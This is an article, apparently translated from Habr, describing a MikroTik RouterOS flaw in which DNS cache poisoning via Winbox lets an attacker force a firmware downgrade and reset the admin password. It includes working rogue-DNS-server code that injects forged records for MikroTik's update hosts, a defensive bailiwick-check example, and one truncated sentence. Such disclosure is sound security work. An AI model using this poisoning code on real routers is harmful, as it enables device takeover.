The ability to remotely downgrade RouterOS-based (MikroTik) devices puts hundreds of thousands of network devices at risk. The vulnerability is tied to DNS cache poisoning through the Winbox protocol and makes it possible to load an old firmware (with the default password reset) or a modified firmware onto the device.
Vulnerability details
The RouterOS terminal supports a resolve command for DNS lookups.
This request is handled by a binary called resolver. The resolver is one of the binaries that connects to RouterOS's Winbox protocol. At a high level, a "message" sent to the Winbox port can be routed to various binaries in RouterOS based on an array-based numbering scheme.
By default, RouterOS has the DNS server feature disabled.
However, even when the server function is disabled, the router maintains its own DNS cache.
When we make a request for example.com using winbox_dns_request, the router caches the result.
Since we can specify which DNS server the request should be sent to, supplying a wrong address is trivial. For example, one can set up a DNS server implementation along the lines of
from dnslib import A, DNSHeader, DNSRecord, RR

def dns_response(data):
    # Parse the incoming query and build an authoritative reply with the same
    # transaction id and question section.
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # Answer whatever name was asked for with an attacker-chosen address.
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()
Now, if you look up example.com using Winbox, you can see that the router's DNS cache has been poisoned.
Of course, poisoning example.com is not very useful, since the router will not use it. However, the router needs to reach upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com and download.mikrotik.com. And thanks to another bug, it is possible to poison all of them at once.
from dnslib import A, DNSHeader, DNSRecord, RR

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # The record that was actually asked for...
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    # ...plus four unrelated records for MikroTik's update hosts, with a
    # one-week TTL; the router caches these even though it never asked for them.
    reply.add_answer(RR("upgrade.mikrotik.com", ttl=604800,
                        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com", ttl=604800,
                        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com", ttl=604800,
                        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com", ttl=604800,
                        rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()
The router asked for a single record and was given five back, and it does not handle those responses correctly: it caches all of them.
Obviously, this attack is also useful when the router acts as a DNS server, since it then allows the router's clients to be attacked as well.
This attack also makes it possible to exploit a more serious vulnerability: downgrading or backporting the RouterOS version. The attacker recreates the update server's logic, including the changelog, and forces RouterOS to treat an older (vulnerable) version as the current one. The danger here is that when the version is "updated", the administrator password is reset to its default value: the attacker can log in to the system with an empty password!
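The caching defect described above is the absence of a bailiwick check: a resolver must only cache answer records whose owner name is the name it asked about (or a name beneath it), whatever TTL the extra records carry. The following is an added example, not code from the article or from MikroTik: it builds a five-record reply of the same shape as the poisoning server above using only the standard library (no dnslib), then applies the check a correct cache would perform. All names, addresses and the transaction id are constructed sample values.

```python
import struct

# Minimal wire-format helpers (A records, class IN, no EDNS).
def _encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def _decode_name(buf, off):
    labels = []
    while True:
        n = buf[off]
        if n == 0:
            off += 1
            break
        if n & 0xC0 == 0xC0:  # compression pointer to an earlier name
            ptr = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            sub, _ = _decode_name(buf, ptr)
            labels.append(sub)
            off += 2
            break
        labels.append(buf[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off

def build_response(txn_id, qname, answers):
    """Build a response with flags QR|AA|RD|RA; answers = [(owner, ttl, ipv4)]."""
    header = struct.pack("!HHHHHH", txn_id, 0x8580, 1, len(answers), 0, 0)
    question = _encode_name(qname) + struct.pack("!HH", 1, 1)  # type A, class IN
    body = b""
    for owner, ttl, ip in answers:
        rdata = bytes(int(o) for o in ip.split("."))
        body += _encode_name(owner) + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + body

def parse_response(buf):
    """Return (queried name, [(owner, ttl, ipv4), ...]) for the A records in the answer section."""
    _txn, _flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", buf[:12])
    qname, off = _decode_name(buf, 12)
    off += 4  # skip qtype/qclass
    answers = []
    for _ in range(an):
        owner, off = _decode_name(buf, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((owner, ttl, ".".join(str(b) for b in rdata)))
    return qname, answers

def in_bailiwick(owner, qname):
    """True if owner is the queried name or lies under it."""
    o, q = owner.lower().rstrip("."), qname.lower().rstrip(".")
    return o == q or o.endswith("." + q)

def cacheable_answers(buf):
    """Split a reply into records a correct cache accepts and records it must discard."""
    qname, answers = parse_response(buf)
    accepted = [a for a in answers if in_bailiwick(a[0], qname)]
    rejected = [a for a in answers if not in_bailiwick(a[0], qname)]
    return accepted, rejected

# Constructed sample: the same five-record reply the poisoning server returns
# for a query about example.com. The addresses are placeholders.
SAMPLE_REPLY = build_response(0x1234, "example.com", [
    ("example.com", 30, "192.168.88.250"),
    ("upgrade.mikrotik.com", 604800, "192.168.88.250"),
    ("cloud.mikrotik.com", 604800, "192.168.88.250"),
    ("cloud2.mikrotik.com", 604800, "192.168.88.250"),
    ("download.mikrotik.com", 604800, "192.168.88.250"),
])

if __name__ == "__main__":
    ok, bad = cacheable_answers(SAMPLE_REPLY)
    print("cached:   ", ok)
    print("discarded:", bad)
```

Run stand-alone, the script keeps only the example.com record and discards the four mikrotik.com records; a cache that instead stores everything in the answer section behaves exactly like the vulnerable router described here.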
The attack works quite well, despite the fact that
Protection
Only disabling Winbox lets you protect yourself from this attack. As convenient as administration via Winbox is, it is better to use the SSH protocol.
Source: www.habr.com